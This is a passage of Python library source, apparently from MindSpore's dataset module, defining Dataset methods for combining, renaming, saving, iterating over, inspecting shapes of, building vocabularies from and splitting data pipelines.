>>> # Create a dataset which is the combination of dataset and dataset_1
>>> dataset = dataset.zip(dataset_1)
"""
if isinstance(datasets, tuple):
datasets = (self, *datasets)
elif isinstance(datasets, Dataset):
datasets = (self, datasets)
else:
raise TypeError("Invalid datasets, expected Dataset object or tuple of Dataset, but got %s!" % datasets)
return ZipDataset(datasets)
@check_concat
def concat(self, datasets):
"""
Concatenate the dataset objects in the input list.
Performing "+" operation on dataset objects can achieve the same effect.
Note:
The column name, and rank and type of the column data must be the same in the input datasets.
Args:
datasets (Union[list, class Dataset]): A list of datasets or a single class Dataset
to be concatenated together with this dataset.
Returns:
Dataset, dataset concatenated.
Examples:
>>> # Create a dataset by concatenating dataset_1 and dataset_2 with "+" operator
>>> dataset = dataset_1 + dataset_2
>>> # Create a dataset by concatenating dataset_1 and dataset_2 with concat operation
>>> dataset = dataset_1.concat(dataset_2)
"""
if isinstance(datasets, Dataset):
datasets = [self] + [datasets]
elif isinstance(datasets, list):
datasets = [self] + datasets
else:
raise TypeError("Invalid datasets, expected Dataset object or list of Dataset, but got %s!" % datasets)
return ConcatDataset(datasets)
@check_rename
def rename(self, input_columns, output_columns):
"""
Rename the columns in input datasets.
Args:
input_columns (Union[str, list[str]]): List of names of the input columns.
output_columns (Union[str, list[str]]): List of names of the output columns.
Returns:
Dataset, dataset renamed.
Examples:
>>> # dataset is an instance object of Dataset
>>> input_columns = ["input_col1", "input_col2", "input_col3"]
>>> output_columns = ["output_col1", "output_col2", "output_col3"]
>>>
>>> # Create a dataset where input_col1 is renamed to output_col1, and
>>> # input_col2 is renamed to output_col2, and input_col3 is renamed
>>> # to output_col3.
>>> dataset = dataset.rename(input_columns=input_columns, output_columns=output_columns)
"""
return RenameDataset(self, input_columns, output_columns)
@check_project
def project(self, columns):
"""
Project certain columns in input dataset.
The specified columns will be selected from the dataset and passed into
the pipeline with the order specified. The other columns are discarded.
Args:
columns(Union[str, list[str]]): List of names of the columns to project.
Returns:
Dataset, dataset projected.
Examples:
>>> # dataset is an instance object of Dataset
>>> columns_to_project = ["column3", "column1", "column2"]
>>>
>>> # Create a dataset that consists of column3, column1, column2
>>> # in that order, regardless of the original order of columns.
>>> dataset = dataset.project(columns=columns_to_project)
"""
return ProjectDataset(self, columns)
def apply(self, apply_func):
"""
Apply a function in this dataset.
Args:
apply_func (function): A function that must take one 'Dataset' as an argument and
return a preprocessed 'Dataset'.
Returns:
Dataset, dataset applied by the function.
Examples:
>>> # dataset is an instance object of Dataset
>>>
>>> # Declare an apply_func function which returns a Dataset object
>>> def apply_func(data):
... data = data.batch(2)
... return data
>>>
>>> # Use apply to call apply_func
>>> dataset = dataset.apply(apply_func)
Raises:
TypeError: If apply_func is not a function.
TypeError: If apply_func doesn't return a Dataset.
"""
if not hasattr(apply_func, '__call__'):
raise TypeError("apply_func must be a function.")
dataset = apply_func(self)
if not isinstance(dataset, Dataset):
raise TypeError("apply_func must return a dataset.")
return dataset
@check_device_send
def device_que(self, send_epoch_end=True, create_data_info_queue=False):
"""
Return a transferred Dataset that transfers data through a device.
Args:
send_epoch_end (bool, optional): Whether to send end of sequence to device or not (default=True).
create_data_info_queue (bool, optional): Whether to create queue which stores
types and shapes of data or not(default=False).
Note:
If device is Ascend, features of data will be transferred one by one. The limitation
of data transmission per time is 256M.
Returns:
Dataset, dataset for transferring.
"""
return self.to_device(send_epoch_end=send_epoch_end, create_data_info_queue=create_data_info_queue)
@check_device_send
def to_device(self, send_epoch_end=True, create_data_info_queue=False):
"""
Transfer data from CPU to GPU or Ascend or other devices.
Args:
send_epoch_end (bool, optional): Whether to send the end of sequence to device or not (default=True).
create_data_info_queue (bool, optional): Whether to create queue which stores
types and shapes of data or not(default=False).
Note:
If device is Ascend, features of data will be transferred one by one. The limitation
of data transmission per second is 256M.
Returns:
TransferDataset, dataset for transferring.
Raises:
RuntimeError: If distribution file path is given but failed to read.
"""
return TransferDataset(self, send_epoch_end, create_data_info_queue)
@check_save
def save(self, file_name, num_files=1, file_type='mindrecord'):
"""
Save the dynamic data processed by the dataset pipeline in common dataset format.
Supported dataset formats: 'mindrecord' only
Implicit type casting exists when saving data as 'mindrecord'. The transform table shows how to do type casting.
.. list-table:: Implicit Type Casting when Saving as 'mindrecord'
:widths: 25 25 50
:header-rows: 1
* - Type in 'dataset'
- Type in 'mindrecord'
- Details
* - bool
- None
- Not supported
* - int8
- int32
-
* - uint8
- bytes(1D uint8)
- Drop dimension
* - int16
- int32
-
* - uint16
- int32
-
* - int32
- int32
-
* - uint32
- int64
-
* - int64
- int64
-
* - uint64
- None
- Not supported
* - float16
- float32
-
* - float32
- float32
-
* - float64
- float64
-
* - string
- string
- Multi-dimensional string not supported
Note:
1. To save the samples in order, set dataset's shuffle to False and num_files to 1.
2. Before calling the function, do not use batch operator, repeat operator or data augmentation operators
with random attribute in map operator.
3. When array dimension is variable, one-dimensional arrays or
multi-dimensional arrays with variable dimension 0 are supported.
4. Mindrecord does not support uint64, multi-dimensional uint8(drop dimension) nor
multi-dimensional string.
Args:
file_name (str): Path to dataset file.
num_files (int, optional): Number of dataset files (default=1).
file_type (str, optional): Dataset format (default='mindrecord').
"""
ir_tree, api_tree = self.create_ir_tree()
runtime_context = cde.PythonRuntimeContext()
runtime_context.Init()
consumer = cde.PythonSaveToDisk(file_name, num_files, file_type)
consumer.Init(ir_tree)
runtime_context.AssignConsumer(consumer)
consumer.Save()
_set_dataset_permissions(file_name, num_files)
del api_tree
@check_tuple_iterator
def create_tuple_iterator(self, columns=None, num_epochs=-1, output_numpy=False, do_copy=True):
"""
Create an iterator over the dataset. The datatype retrieved back will be a list of ndarrays.
To specify which columns to list and the order needed, use columns_list. If columns_list
is not provided, the order of the columns will remain unchanged.
Args:
columns (list[str], optional): List of columns to be used to specify the order of columns
(default=None, means all columns).
num_epochs (int, optional): Maximum number of epochs that iterator can be iterated.
(default=-1, iterator can be iterated infinite number of epochs)
output_numpy (bool, optional): Whether or not to output NumPy datatype.
If output_numpy=False, iterator will output MSTensor (default=False).
do_copy (bool, optional): when output data type is mindspore.Tensor,
use this param to select the conversion method, only take False for better performance (default=True).
Returns:
Iterator, tuple iterator over the dataset.
Examples:
>>> # dataset is an instance object of Dataset
>>> iterator = dataset.create_tuple_iterator()
>>> for item in iterator:
... # item is a list
... print(type(item))
... break
<class 'list'>
"""
if output_numpy is None:
output_numpy = False
if Dataset._noop_mode():
return DummyIterator(self, 'tuple')
return TupleIterator(self, columns, num_epochs, output_numpy, do_copy)
@check_dict_iterator
def create_dict_iterator(self, num_epochs=-1, output_numpy=False):
"""
Create an iterator over the dataset. The data retrieved will be a dictionary datatype.
The order of the columns in the dictionary may not be the same as the original order.
Args:
num_epochs (int, optional): Maximum number of epochs that iterator can be iterated
(default=-1, iterator can be iterated infinite number of epochs).
output_numpy (bool, optional): Whether or not to output NumPy datatype,
if output_numpy=False, iterator will output MSTensor (default=False).
Returns:
Iterator, dictionary iterator over the dataset.
Examples:
>>> # dataset is an instance object of Dataset
>>> iterator = dataset.create_dict_iterator()
>>> for item in iterator:
... # item is a dict
... print(type(item))
... break
<class 'dict'>
"""
if output_numpy is None:
output_numpy = False
if Dataset._noop_mode():
return DummyIterator(self, 'dict')
return DictIterator(self, num_epochs, output_numpy)
def __iter__(self):
"""Create an iterator over the dataset."""
return self.create_tuple_iterator(num_epochs=1)
@property
def input_indexs(self):
"""
Get Input Index Information
Returns:
tuple, tuple of the input index information.
Examples:
>>> # dataset is an instance object of Dataset
>>> # set input_indexs
>>> dataset.input_indexs = 10
>>> print(dataset.input_indexs)
10
"""
if self._input_indexs != ():
return self._input_indexs
# find input_indexes of children
children_input_index = [child.input_indexs for child in self.children]
# in case of more than one child, return the first input_indexes
for cix in children_input_index:
if cix != ():
return cix
# if all children's input_indexes are () or the node is a leaf
return self._input_indexs
@input_indexs.setter
def input_indexs(self, value):
self._input_indexs = value
def copy_batch_size(self, value):
self._batch_size = value
def _init_tree_getters(self):
"""
Get pipeline information.
"""
ir_tree, api_tree = self.create_ir_tree()
runtime_context = cde.PythonRuntimeContext()
runtime_context.Init()
getter = cde.TreeGetters()
getter.Init(ir_tree)
runtime_context.AssignConsumer(getter)
return getter, runtime_context, api_tree
def __init_size_getter(self):
"""
Get pipeline information.
"""
ir_tree, api_tree = self.create_ir_tree()
runtime_context = cde.PythonRuntimeContext()
runtime_context.Init()
getter = cde.DatasetSizeGetters()
getter.Init(ir_tree)
runtime_context.AssignConsumer(getter)
return getter, runtime_context, api_tree
def get_col_names(self):
"""
Return the names of the columns in dataset.
Returns:
list, list of column names in the dataset.
Examples:
>>> # dataset is an instance object of Dataset
>>> col_names = dataset.get_col_names()
"""
if self._col_names is None:
runtime_getter = self._init_tree_getters()
self._col_names = runtime_getter[0].GetColumnNames()
self.close_pool()
runtime_getter[2].notify_watchdog()
return self._col_names
def output_shapes(self):
"""
Get the shapes of output data.
Returns:
list, list of shapes of each column.
Examples:
>>> # dataset is an instance object of Dataset
>>> output_shapes = dataset.output_shapes()
"""
if self.saved_output_shapes is None:
runtime_getter = self._init_tree_getters()
self.saved_output_shapes = runtime_getter[0].GetOutputShapes()
self.saved_output_types = runtime_getter[0].GetOutputTypes()
self.close_pool()
runtime_getter[2].notify_watchdog()
if self.dynamic_setting[0]:
self.saved_output_shapes, self.saved_min_shapes, self.saved_max_shapes = self._dynamic_output_shapes()
return self.saved_output_shapes
def output_types(self):
"""
Get the types of output data.
Returns:
list, list of data types.
Examples:
>>> # dataset is an instance object of Dataset
>>> output_types = dataset.output_types()
"""
if self.saved_output_types is None:
runtime_getter = self._init_tree_getters()
self.saved_output_shapes = runtime_getter[0].GetOutputShapes()
self.saved_output_types = runtime_getter[0].GetOutputTypes()
self.close_pool()
runtime_getter[2].notify_watchdog()
if self.dynamic_setting[0]:
self.saved_output_shapes, self.saved_min_shapes, self.saved_max_shapes = self._dynamic_output_shapes()
return self.saved_output_types
def get_dataset_size(self):
"""
Return the number of batches in an epoch.
Returns:
int, number of batches.
Examples:
>>> # dataset is an instance object of Dataset
>>> dataset_size = dataset.get_dataset_size()
"""
if self.dataset_size is None:
runtime_getter = self.__init_size_getter()
self.dataset_size = runtime_getter[0].GetDatasetSize(False)
self.close_pool()
runtime_getter[2].notify_watchdog()
return self.dataset_size
def set_dynamic_columns(self, columns=None):
"""
Set dynamic shape information of source data, it should be set after the pipeline is defined.
Args:
columns (dict): A dict contains shape information of each column in dataset.
The value of shape[i] is :py:obj:`None` indicates that the data length of shape[i] is dynamic.
Examples:
>>> import numpy as np
>>>
>>> def generator1():
... for i in range(1, 100):
... yield np.ones((16, i, 83)), np.array(i)
>>>
>>> dataset = ds.GeneratorDataset(generator1, ["data1", "data2"])
>>> dataset.set_dynamic_columns(columns={"data1": [16, None, 83], "data2": []})
"""
if not isinstance(columns, dict):
raise TypeError("Pass a dict to set dynamic shape, example: {\"data1\": [16, None, 256]}")
self.dynamic_setting[0] = True
self.dynamic_setting[1] = columns
def dynamic_min_max_shapes(self):
"""
Get minimum and maximum data length of dynamic source data, for dynamic graph compilation.
Returns:
lists, min_shapes, max_shapes of source data.
Examples:
>>> import numpy as np
>>>
>>> def generator1():
... for i in range(1, 100):
... yield np.ones((16, i, 83)), np.array(i)
>>>
>>> dataset = ds.GeneratorDataset(generator1, ["data1", "data2"])
>>> dataset.set_dynamic_columns(columns={"data1": [16, None, 83], "data2": []})
>>> min_shapes, max_shapes = dataset.dynamic_min_max_shapes()
"""
if self.saved_min_shapes is None or self.saved_max_shapes is None:
self.saved_output_shapes, self.saved_min_shapes, self.saved_max_shapes = self._dynamic_output_shapes()
return self.saved_min_shapes, self.saved_max_shapes
@staticmethod
def __check_dynamic_column_name(dynamic_columns, dataset_columns):
for column in dynamic_columns:
if column not in dataset_columns:
raise RuntimeError("dynamic column [" + column + "] does not match any column in dataset: " +
str(dataset_columns))
@staticmethod
def __check_dynamic_column_shape(data, col, dynamic_columns):
shape_mismatch = "dynamic column [" + col + "] with shape " + str(dynamic_columns[col]) + \
" does not match dataset column [" + col + "] with shape " + str(list(data[col].shape))
if data[col].ndim != len(dynamic_columns[col]):
raise RuntimeError(shape_mismatch)
for dim in range(len(dynamic_columns[col])):
if dynamic_columns[col][dim] is not None and dynamic_columns[col][dim] != data[col].shape[dim]:
raise RuntimeError(shape_mismatch)
def _dynamic_output_shapes(self):
"""
Get dynamic information of source data.
Returns:
lists, dynamic_shapes, min_shapes, max_shapes of source data.
"""
if not self.dynamic_setting[1]:
raise RuntimeError("dynamic_columns is not set, call set_dynamic_columns() by final Dataset Op.")
if self.saved_output_shapes is not None and self.saved_min_shapes is not None and \
self.saved_max_shapes is not None:
return self.saved_output_shapes, self.saved_min_shapes, self.saved_max_shapes
logger.warning("Calculating dynamic shape of input data, this will take a few minutes...")
# Assume data1 shape is dynamic, data2 shape is fix
# {"data1": [batch_size, None, feat_len], "data2": [batch_size, feat_len]}
dynamic_columns = self.dynamic_setting[1]
# ["data1", "data2"]
dataset_columns = self.get_col_names()
Dataset.__check_dynamic_column_name(dynamic_columns, dataset_columns)
# Shape[1] of data1 is variable
# {"data1": {(batch_size, 100, feat_len), (16, 200, 83)}, "data2": {(batch_size, feat_len)}}
column_shape_set = {col: set() for col in dataset_columns}
dataset_size_counter = 0
for data in self.create_dict_iterator(num_epochs=1, output_numpy=True):
dataset_size_counter += 1
for col in data.keys():
if col in dynamic_columns:
Dataset.__check_dynamic_column_shape(data, col, dynamic_columns)
column_shape_set[col].add(tuple(data[col].shape))
# we get dataset_size after dryrun
self.dataset_size = dataset_size_counter
min_shapes, max_shapes, dynamic_shapes = list(), list(), list()
for col, shape_set in column_shape_set.items():
if len(shape_set) > 1:
if col not in dynamic_columns:
raise RuntimeError("column [" + col + "] has dynamic shape but not set by set_dynamic_columns()" +
", shapes of [" + col + "]: " + str(list(shape_set)))
shape_npy = np.array(list(shape_set))
max_shape = shape_npy.max(axis=0)
min_shape = shape_npy.min(axis=0)
# Set min shape to 1 due to unknown shuffle
min_shape = np.where(np.equal(dynamic_columns[col], None), 1, min_shape)
# Set dynamic dim to -1 for ME
dynamic_shape = np.where(np.equal(dynamic_columns[col], None), -1, dynamic_columns[col])
max_shapes.append(max_shape.tolist())
min_shapes.append(min_shape.tolist())
dynamic_shapes.append(dynamic_shape.tolist())
else:
# Also append fix shape to keep order of column shape
fix_shape = list(list(shape_set)[0])
max_shapes.append(fix_shape)
min_shapes.append(fix_shape)
dynamic_shapes.append(fix_shape)
if col in dynamic_columns:
logger.warning("column [" + col + "] has no dynamic shape but set by set_dynamic_columns()")
# Set min shape to 1 due to unknown shuffle
min_shapes[-1] = np.where(np.equal(dynamic_columns[col], None), 1, fix_shape).tolist()
# Set dynamic dim to -1 for ME
dynamic_shapes[-1] = np.where(np.equal(dynamic_columns[col], None), -1, fix_shape).tolist()
return dynamic_shapes, min_shapes, max_shapes
def num_classes(self):
"""
Get the number of classes in a dataset.
Returns:
int, number of classes.
Examples:
>>> # dataset is an instance object of Dataset
>>> num_classes = dataset.num_classes()
"""
if self._num_classes is None:
runtime_getter = self._init_tree_getters()
self._num_classes = runtime_getter[0].GetNumClasses()
self.close_pool()
runtime_getter[2].notify_watchdog()
if self._num_classes == -1:
return None
return self._num_classes
def get_sync_notifiers(self):
if self.children:
return self.children[0].get_sync_notifiers()
return {}
def disable_sync(self):
if self.children:
return self.children[0].disable_sync()
return {}
def is_sync(self):
if self.children:
return self.children[0].is_sync()
return False
def sync_update(self, condition_name, num_batch=None, data=None):
"""
Release a blocking condition and trigger callback with given data.
Args:
condition_name (str): The condition name that is used to toggle sending next row.
num_batch (Union[int, None]): The number of batches (rows) that are released.
When num_batch is None, it will default to the number specified by the
sync_wait operator (default=None).
data (Any): The data passed to the callback, user defined (default=None).
"""
if (not isinstance(num_batch, int) and num_batch is not None) or \
(isinstance(num_batch, int) and num_batch <= 0):
# throwing exception, disable all sync_wait in pipeline
self.disable_sync()
raise RuntimeError("Sync_update batch size can only be positive integer, got : {}.".format(num_batch))
notifiers_dict = self.get_sync_notifiers()
if not isinstance(condition_name, str):
raise TypeError("Argument condition_name with value {} is not of type str, but got {}."
.format(condition_name, type(condition_name)))
if condition_name not in notifiers_dict:
# throwing exception, disable all sync_wait in pipeline
self.disable_sync()
raise RuntimeError("Condition name not found.")
if num_batch is not None:
num_batch *= self.get_batch_size()
notifiers_dict[condition_name](num_batch, data)
def get_batch_size(self):
"""
Return the size of batch.
Returns:
int, the number of data in a batch.
Examples:
>>> # dataset is an instance object of Dataset
>>> batch_size = dataset.get_batch_size()
"""
if self._batch_size is None:
runtime_getter = self._init_tree_getters()
self._batch_size = runtime_getter[0].GetBatchSize()
if self._batch_size is None:
self._batch_size = 1
return self._batch_size
def get_repeat_count(self):
"""
Get the replication times in RepeatDataset (default is 1).
Returns:
int, the count of repeat.
Examples:
>>> # dataset is an instance object of Dataset
>>> repeat_count = dataset.get_repeat_count()
"""
if self._repeat_count is None:
runtime_getter = self._init_tree_getters()
self._repeat_count = runtime_getter[0].GetRepeatCount()
if self._repeat_count is None:
self._repeat_count = 1
return self._repeat_count
def get_class_indexing(self):
"""
Return the class index.
Returns:
dict, a str-to-int mapping from label name to index.
dict, a str-to-list<int> mapping from label name to index for Coco ONLY. The second number
in the list is used to indicate the super category.
Examples:
>>> # dataset is an instance object of Dataset
>>> class_indexing = dataset.get_class_indexing()
"""
if self.children:
return self.children[0].get_class_indexing()
return {}
def reset(self):
"""Reset the dataset for next epoch."""
def is_shuffled(self):
"""Returns True if the dataset or its children is shuffled."""
for input_dataset in self.children:
if input_dataset.is_shuffled():
return True
return False
def is_sharded(self):
"""Returns True if the dataset or its children is sharded."""
for input_dataset in self.children:
if input_dataset.is_sharded():
return True
return False
def parse(self, children=None):
raise NotImplementedError("Dataset has to implement parse method.")
def post_parse(self, ir_node):
if self.cache:
ir_node = ir_node.set_cache_client(self.cache.cache_client)
if self.num_parallel_workers:
ir_node = ir_node.set_num_workers(self.num_parallel_workers)
return ir_node
class VisionBaseDataset(Dataset):
"""
Abstract class to represent a vision source dataset which produces content to the data pipeline.
"""
def __init__(self, children=None, num_parallel_workers=None, cache=None):
super().__init__(children=children, num_parallel_workers=num_parallel_workers, cache=cache)
def parse(self, children=None):
raise NotImplementedError("Dataset has to implement parse method.")
class TextBaseDataset(Dataset):
"""
Abstract class to represent a text source dataset which produces content to the data pipeline.
"""
def __init__(self, children=None, num_parallel_workers=None, cache=None):
super().__init__(children=children, num_parallel_workers=num_parallel_workers, cache=cache)
def parse(self, children=None):
raise NotImplementedError("Dataset has to implement parse method.")
def build_vocab(self, columns, freq_range, top_k, special_tokens, special_first):
"""
Function to create a Vocab from source dataset.
Desired source dataset is a text type dataset.
Build a vocab from a dataset. This would collect all the unique words in a dataset and return a vocab
which contains top_k most frequent words (if top_k is specified)
Args:
columns(Union[str, list[str]]): Column names to get words from.
freq_range(tuple[int]): A tuple of integers (min_frequency, max_frequency). Words within the frequency
range will be stored.
Naturally 0 <= min_frequency <= max_frequency <= total_words. min_frequency/max_frequency
can be set to default, which corresponds to 0/total_words separately.
top_k(int): Number of words to be built into vocab. top_k most frequent words are
taken. The top_k is taken after freq_range. If not enough top_k, all words will be taken
special_tokens(list[str]): A list of strings, each one is a special token.
special_first(bool): Whether special_tokens will be prepended/appended to vocab, If special_tokens
is specified and special_first is set to default, special_tokens will be prepended.
Returns:
Vocab, vocab built from the dataset.
Examples:
>>> import numpy as np
>>>
>>> def gen_corpus():
... # key: word, value: number of occurrences, reason for using letters is so their order is apparent
... corpus = {"Z": 4, "Y": 4, "X": 4, "W": 3, "U": 3, "V": 2, "T": 1}
... for k, v in corpus.items():
... yield (np.array([k] * v, dtype='S'),)
>>> column_names = ["column1"]
>>> dataset = ds.GeneratorDataset(gen_corpus, column_names)
>>> dataset = dataset.build_vocab(columns=["column1"],
... freq_range=(1, 10), top_k=5,
... special_tokens=["<pad>", "<unk>"],
... special_first=True)
"""
vocab = cde.Vocab()
columns = replace_none(columns, [])
if not isinstance(columns, list):
columns = [columns]
freq_range = replace_none(freq_range, (0, 9223372036854775807))
if freq_range[0] is None:
freq_range = (0, freq_range[1])
if freq_range[1] is None:
freq_range = (freq_range[0], 9223372036854775807)
special_tokens = replace_none(special_tokens, [])
top_k = replace_none(top_k, 9223372036854775807)
ir_tree, api_tree = self.create_ir_tree()
# vocab node
vocab_node = cde.BuildVocabNode(ir_tree, vocab, columns, freq_range, top_k, special_tokens, special_first)
runtime_context = cde.PythonRuntimeContext()
runtime_context.Init()
# build vocab
consumer = cde.PythonBuildVocabConsumer()
consumer.Init(vocab_node)
runtime_context.AssignConsumer(consumer)
consumer.Start()
del api_tree
return vocab
def build_sentencepiece_vocab(self, columns, vocab_size, character_coverage, model_type, params):
"""
Function to create a SentencePieceVocab from source dataset.
Desired source dataset is a text type dataset.
Args:
columns(list[str]): Column names to get words from.
vocab_size(int): Vocabulary size.
character_coverage(float): Percentage of characters covered by the model, must be between
0.98 and 1.0 Good defaults are: 0.9995 for languages with rich character sets like
Japanese or Chinese character sets, and 1.0 for other languages with small character sets
like English or Latin.
model_type(SentencePieceModel): Model type. Choose from unigram (default), bpe, char, or word.
The input sentence must be pretokenized when using word type.
params(dict): Any extra optional parameters of sentencepiece library according to your raw data
Returns:
SentencePieceVocab, vocab built from the dataset.
Examples:
>>> from mindspore.dataset.text import SentencePieceModel
>>>
>>> # You can construct any text dataset as source, take TextFileDataset as example.
>>> dataset = ds.TextFileDataset("/path/to/sentence/piece/vocab/file", shuffle=False)
>>> dataset = dataset.build_sentencepiece_vocab(["text"], 5000, 0.9995, SentencePieceModel.UNIGRAM, {})
"""
if not isinstance(model_type, SentencePieceModel):
raise TypeError("Argument model_type with value {0} is not of type SentencePieceModel, but got {1}."\
.format(model_type, type(model_type)))
model_type = DE_C_INTER_SENTENCEPIECE_MODE[model_type]
vocab = cde.SentencePieceVocab()
ir_tree, api_tree = self.create_ir_tree()
# vocab node
vocab_node = cde.BuildSentenceVocabNode(ir_tree, vocab, columns, vocab_size, character_coverage, model_type,
params)
runtime_context = cde.PythonRuntimeContext()
runtime_context.Init()
# build vocab
consumer = cde.PythonBuildVocabConsumer()
consumer.Init(vocab_node)
runtime_context.AssignConsumer(consumer)
consumer.Start()
del api_tree
return vocab
class AudioBaseDataset(Dataset):
"""
Abstract class to represent a audio source dataset which produces content to the data pipeline.
"""
def __init__(self, children=None, num_parallel_workers=None, cache=None):
super().__init__(children=children, num_parallel_workers=num_parallel_workers, cache=cache)
def parse(self, children=None):
raise NotImplementedError("Dataset has to implement parse method.")
class UnionBaseDataset(VisionBaseDataset, TextBaseDataset, AudioBaseDataset):
"""
Abstract class to represent a union source dataset which produces content to the data pipeline.
"""
def __init__(self, children=None, num_parallel_workers=None, cache=None):
super().__init__(children=children, num_parallel_workers=num_parallel_workers, cache=cache)
def parse(self, children=None):
raise NotImplementedError("Dataset has to implement parse method.")
class SourceDataset(Dataset):
"""
Abstract class to represent a source dataset which produces content to the data pipeline.
"""
def __init__(self, num_parallel_workers=None, num_samples=None, shuffle=True, num_shards=None, shard_id=None,
cache=None):
super().__init__(num_parallel_workers=num_parallel_workers, cache=cache)
self.num_samples = replace_none(num_samples, 0)
self.num_shards = replace_none(num_shards, 1)
self.shard_id = replace_none(shard_id, 0)
if shuffle is not None and not isinstance(shuffle, (bool, Shuffle)):
raise TypeError("shuffle must be of boolean or enum of 'Shuffle' values like 'Shuffle.GLOBAL' or "
"'Shuffle.FILES' or 'Shuffle.INFILE'.")
self.shuffle_flag = 2 # Global shuffle
if not isinstance(shuffle, Shuffle):
if shuffle is None or shuffle:
self.shuffle_flag = 2 # Global shuffle
else:
self.shuffle_flag = 0 # No shuffle
else:
if shuffle == Shuffle.GLOBAL:
self.shuffle_flag = 2 # Global shuffle
elif shuffle == Shuffle.FILES:
self.shuffle_flag = 1 # Files shuffle
elif shuffle == Shuffle.INFILE:
self.shuffle_flag = 3 # Infile shuffle
def parse(self, children=None):
raise NotImplementedError("Dataset has to implement parse method.")
@staticmethod
def _find_files(patterns):
"""
Utility function to search for files with the given glob patterns.
Args:
patterns (Union[str, list[str]]): String or list of patterns to be searched.
Returns:
list, list of files.
"""
if not isinstance(patterns, list):
patterns = [patterns]
file_list = []
unmatched_patterns = []
for pattern in patterns:
matches = [match for match in glob.glob(pattern, recursive=True) if os.path.isfile(match)]
if matches:
file_list.extend(matches)
else:
unmatched_patterns.append(pattern)
if unmatched_patterns:
raise ValueError("The following patterns did not match any files: {}.".format(unmatched_patterns))
if file_list: # not empty
return file_list
raise ValueError("The list of path names matching the patterns is empty.")
def is_shuffled(self):
return self.shuffle_flag > 0
def is_sharded(self):
if self.num_shards is not None:
return self.num_shards > 1
return False
class MappableDataset(SourceDataset):
"""
Abstract class to represent a source dataset which supports use of samplers.
"""
def parse(self, children=None):
raise NotImplementedError("Dataset has to implement parse method.")
def __init__(self, num_parallel_workers=None, sampler=None, num_samples=None, shuffle=None, num_shards=None,
shard_id=None, cache=None):
super().__init__(num_parallel_workers=num_parallel_workers, num_samples=num_samples, shuffle=shuffle,
num_shards=num_shards, shard_id=shard_id, cache=cache)
self.shuffle_flag = replace_none(shuffle, True)
self.sampler = samplers.select_sampler(num_samples, sampler, shuffle, num_shards, shard_id)
def add_sampler(self, new_sampler):
"""
Add a sampler for current dataset.
Args:
new_sampler (Sampler): The sampler to be added as the parent sampler for current dataset.
Examples:
>>> # dataset is an instance object of Dataset
>>> # use a DistributedSampler instead
>>> new_sampler = ds.DistributedSampler(10, 2)
>>> dataset.add_sampler(new_sampler)
"""
# note: By adding a sampler, the sampled IDs will flow to new_sampler
# after first passing through the current samplers attached to this dataset.
self.dataset_size = None
new_sampler.add_child(self.sampler)
self.sampler = new_sampler
def use_sampler(self, new_sampler):
"""
Make the current dataset use the new_sampler provided by other API.
Args:
new_sampler (Sampler): The sampler to use for the current dataset.
Examples:
>>> # dataset is an instance object of Dataset
>>> # use a DistributedSampler instead
>>> new_sampler = ds.DistributedSampler(10, 2)
>>> dataset.use_sampler(new_sampler)
"""
if new_sampler is None:
raise TypeError("Input sampler can not be None.")
if not isinstance(new_sampler, (samplers.BuiltinSampler, samplers.Sampler)):
raise TypeError("Input sampler is not an instance of a sampler.")
self.dataset_size = None
self.sampler = self.sampler.child_sampler
self.add_sampler(new_sampler)
def is_shuffled(self):
return self.sampler.is_shuffled()
def is_sharded(self):
return self.sampler.is_sharded()
@check_split
def split(self, sizes, randomize=True):
"""
Split the dataset into smaller, non-overlapping datasets.
Args:
sizes (Union[list[int], list[float]]): If a list of integers [s1, s2, …, sn] is
provided, the dataset will be split into n datasets of size s1, size s2, …, size sn
respectively. If the sum of all sizes does not equal the original dataset size, an
error will occur.
If a list of floats [f1, f2, …, fn] is provided, all floats must be between 0 and 1
and must sum to 1, otherwise an error will occur. The dataset will be split into n
Datasets of size round(f1*K), round(f2*K), …, round(fn*K) where K is the size of the
original dataset.
If after rounding:
- Any size equals 0, an error will occur.
- The sum of split sizes < K, the difference will be added to the first split.
- The sum of split sizes > K, the difference will be removed from the first large
enough split such that it will have at least 1 row after removing the difference.
randomize (bool, optional): Determines whether or not to split the data randomly (default=True).
If True, the data will be randomly split. Otherwise, each split will be created with
consecutive rows from the dataset.
Note:
1. There is an optimized split function, which will be called automatically when the dataset
that calls this function is a MappableDataset.
2. Dataset should not be sharded if split is going to be called. Instead, create a
DistributedSampler and specify a split to shard after splitting. If the dataset is
sharded after a split, it is strongly recommended setting the same seed in each instance
of execution, otherwise each shard may not be part of the same split (see Examples).
3. It is strongly recommended to not shuffle the dataset, but use randomize=True instead.
Shuffling the dataset may not be deterministic, which means the data in each split
will be different in each epoch. Furthermore, if sharding occurs after split, each
shard may not be part of the same split.
Raises:
RuntimeError: If get_dataset_size returns None or is not supported for this dataset.
RuntimeError: If `sizes` is list of integers and sum of all elements in sizes does not
equal the dataset size.
RuntimeError: If `sizes` is list of float and there is a split with size 0 after calculations.
RuntimeError: If the dataset is sharded prior to calling split.
ValueError: If `sizes` is list of float and not all floats are between 0 and 1, or if the
floats don't sum to 1.
Returns:
tuple(Dataset), a tuple of datasets that have been split.
Examples:
>>> # Since many datasets have shuffle on by default, set shuffle to False if split will be called!
>>> dataset = ds.ImageFolderDataset(image_folder_dataset_dir, shuffle=False)
>>>
>>> # Set the seed, and tell split to use this seed when randomizing.
>>> # This is needed because sharding will be done later
>>> ds.config.set_seed(58)
>>> train_dataset, test_dataset = dataset.split([0.9, 0.1])
>>>
>>> # To shard the train dataset, use a DistributedSampler
>>> train_sampler = ds.DistributedSampler(10, 2)
>>> train_dataset.use_sampler(train_sampler)
"""
if self.is_shuffled():
logger.warning("Dataset is shuffled before split.")
if self.is_sharded():
raise RuntimeError("Dataset should not be sharded before split.")
absolute_sizes = self._get_absolute_split_sizes(sizes)
splits = []
current_split_start_index = 0
for size in absolute_sizes:
ds = copy.deepcopy(self)
ds.dataset_size = None
if randomize:
# want to shuffle the same way every epoch before split, we are assuming
# that the user will call set_seed
random_sampler = samplers.RandomSampler()
random_sampler.reshuffle_each_epoch = False
ds.add_sampler(random_sampler)
subset_sampler = samplers.SequentialSampler(current_split_start_index, size)
ds.add_sampler(subset_sampler)
# add sequential sampler, so that if user calls use_sampler, we will
# get rid of the sequential sampler instead of something we need
ds.add_sampler(samplers.SequentialSampler())
splits.append(ds)
current_split_start_index += size
return tuple(splits)
class BucketBatchByLengthDataset(UnionBaseDataset):
"""
The result of applying BucketBatchByLength operator to the input dataset.
"""
def __init__(self, input_dataset, column_names, bucket_boundaries, bucket_batch_sizes, element_length_function,
pad_info, pad_to_bucket_boundary, drop_remainder):
super().__init__(children=input_dataset)
self.column_names = to_list(column_names)
